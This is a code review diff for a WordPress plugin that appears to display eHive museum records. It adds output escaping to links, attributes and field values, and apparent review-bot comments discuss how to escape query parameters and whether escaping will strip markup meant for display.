echo '<li>lightbox</li>';
} else {
- echo '<li><a href="'.$link.'&view=lightbox'.'">lightbox</a></li>';
+ echo '<li><a href="'.esc_url($link).'&view=lightbox'.'">lightbox</a></li>';
}
}
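Review bot: Only `$link` is passed through `esc_url()`; the `&view=lightbox` suffix is concatenated afterwards as a raw ampersand, so the href mixes an escaped prefix with an unescaped query parameter. Build the full URL first and escape it whole: `echo '<li><a href="'.esc_url(add_query_arg('view', 'lightbox', $link)).'">lightbox</a></li>';`. The `list` link in the next hunk has the same shape and should change the same way.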
@@ -240,7 +257,7 @@
if ($view == 'list') {
echo '<li>list</li>';
} else {
- echo '<li><a href="'.$link.'&view=list'.'">list</a></li>';
+ echo '<li><a href="'.esc_url($link).'&view=list'.'">list</a></li>';
}
}
@@ -288,30 +305,30 @@
$fieldLabel = $options["lightbox_{$key}_enabled_label"];
}
if ( isset($fieldValue) && $fieldValue !='' ) {
- echo '<p class="ehive-field ehive-identifier-'.$key.'">';
+ echo '<p class="ehive-field ehive-identifier-'.esc_attr($key).'">';
if (isset($fieldLabel) && $fieldLabel !='') {
- echo '<span class="ehive-field-label">'.$fieldLabel.'</span>';
+ echo '<span class="ehive-field-label">'.esc_html($fieldLabel).'</span>';
}
if (isset($fieldValue) && $fieldValue !='') {
- echo $fieldValue;
+ echo esc_html($fieldValue);
}
echo '</p>';
}
}
if (isset($options['lightbox_more_link_enabled']) && $options['lightbox_more_link_enabled'] == "on") {
- echo '<a class="ehive-more-link" href="'.$eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId).'">'.$options['lightbox_more_link_text'].'</a>';
+ echo '<a class="ehive-more-link" href="'.esc_url($eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId)).'">'.esc_html($options['lightbox_more_link_text']).'</a>';
}
}
function listMetadata($options, $objectRecord, $eHiveAccess, $eHiveApi) {
$showPublicProfileName = (isset($options['show_public_profile_name']) && $options['show_public_profile_name'] == 'on') ? true : false;
$showCatalogueTypeIcon = (isset($options['show_catalogue_type_icon']) && $options['show_catalogue_type_icon'] == 'on') ? true : false;
- echo '<a href="'.$eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId).'"><span class="ehive-item-summary">'.listFields($options, $objectRecord).'</span></a>';
+ echo '<a href="'.esc_url($eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId)).'"><span class="ehive-item-summary">'.esc_html(listFields($options, $objectRecord)).'</span></a>';
if ( $showPublicProfileName ) {
echo '<p class="ehive-field ehive-identifier-public_profile_name">';
echo '<span class="ehive-field-label">From: </span>';
- echo '<a href="'.$eHiveAccess->getAccountDetailsPageLink($objectRecord->account->accountId).'">'.$objectRecord->account->publicProfileName.'</a>';
+ echo '<a href="'.esc_url($eHiveAccess->getAccountDetailsPageLink($objectRecord->account->accountId)).'">'.esc_html($objectRecord->account->publicProfileName).'</a>';
echo '</p>';
}
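Review bot: `esc_html()` is now applied to `$fieldValue`, to the return of `listFields()` and to `$objectRecord->account->publicProfileName`; if any of those can carry markup intended for display, the tags will now print literally. `listFields()` is defined outside this hunk, so its return contract is not visible here — confirm it, and confirm whether the eHive record fields are plain text. Where markup is expected, `wp_kses_post()` keeps a safe subset instead of escaping everything; where plain text is the contract, the change is right as written.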
@@ -340,7 +357,6 @@
break;
}
}
-
}
function listFields($options, $objectRecord) {